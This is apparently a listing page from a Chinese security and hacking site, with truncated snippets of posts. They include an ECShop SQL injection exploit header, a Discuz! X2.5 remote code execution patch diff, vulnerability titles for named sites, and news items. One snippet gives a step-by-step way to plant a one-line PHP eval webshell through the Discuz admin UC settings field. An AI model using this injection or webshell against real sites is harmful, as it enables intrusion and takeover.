文章列表
ECShop <= v2.7.3 SQL injection / exploit
{:6_449:} 好像是最新的<?phpprint_r('+---------------------------------------------------------------------------+ECShop <= v2.7.3 SQL injection / exploitby 帅的一塌糊涂mail: hiqiushuiabc gmail dot comteam: http://hi.baidu.com/w5r2dork: "Powered by ECShop"+-----------------------
Discuz! X2.5管理后台uc配置 get webshell漏洞
首先,进入后台以管理员身份登录; 然后,打开站长→UC设置 看截图:在UC设置ip地址里面填写 经过处理的一句话如下 Madman\’);eval($_POST)?>;// QQ 然后保存即可。 连接地址:http://bbs.xxxxx.com/config/config_ucenter.php
补发20120407 Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]
最近大家开始关注discuz了,由于之前t00ls关站好久,错过一些dz的漏洞,转载下。if(!defined('IN_DISCUZ')) {@@ -89,7 +89,7 @@}}if($searcharray && $replacearray) {- $content = preg_replace("/(.*?)|()|(\(\d+)\)/ies", 'helper_seo::base64_transform("encode", "", "\\1\\2\\3", "")', $content
新浪(sina.com.cn)某分站 URL跳转漏洞
新浪(sina.com.cn)某分站 URL跳转漏洞
【工具】Linux 无线热点 Adhoc
Adhoc为Linux下的命令工具,让你PC上的无线设备成为无线热点(Access Point),就像无线路由器一样,其他网络设备可以通过该AP访问Internet资源(前提是你的PC已经连入网络).该工具将指定的无线设备接口创建为热点,并能够设置无线网络名称ESSID,以及连入网络所需的密码等.该工具小巧,方便,适合不喜欢通过UI配
日媒:日拟招募黑客应对中国网络攻击
核心提示: 日本防卫省正在研究为新设立的网络专业部队招募黑客,弥补自卫队在互联网领域的弱点,确保攻击能力。 参考消息网10月1日报道 2013财年,日本防卫省将新设立海陆空自卫队联合部队“网络空间防卫队”。该部队组建期的规模约为100人,它同时负责研发具有攻击能力的计算机病毒。 据日本《产经新
互联星空(vnet.cn)某分站 Struts2代码执行漏洞
互联星空(vnet.cn)某分站 Struts2代码执行漏洞
Adobe发布公告,签名证书遭恶意盗用,但并无证据表明Adobe的源代码被窃
鉴于受到两款使用有效的数字认证签名的恶意程序侵袭,本周四Adobe正式宣布停止目前的数字签名服务器,并积极进入取证调查环节。目前Adobe负责数据证书的服务器遭到了破坏,但是目前并没有证据显示源代码被窃或者被损坏。公司目前正积极撤回这些受感染数字证书已经使用证书进行更新的Adobe软件。根据产
侵入学校电脑系统南昌一高校生帮70余名同学改成绩
发现学校教务系统存在漏洞后,该校学生王明(化名)和刘华(化名)合作,广泛散发“考试不挂科”的小广告,给70余名同校学生修改了100余门考试不及格的成绩,每科按150元至200元不等的价格收费,获利2.6万余元。9月28日,南昌高新公安分局通报网安大队会同国保大队一举破获利用计算机系统漏洞修改考试成绩
PHP代码审计学习总结
0x01 引言 PHP是一种被广泛使用的脚本语言,尤其适合于web开发。具有跨平台,容易学习,功能强大等特点,据统计全世界有超过34%的网站有php的应用,包括Yahoo、sina、163、sohu等大型门户网站。而且很多具名的web应用系统(包括bbs,blog,wiki,cms等等)都是使用php开发的,Discuz、phpwind、phpbb
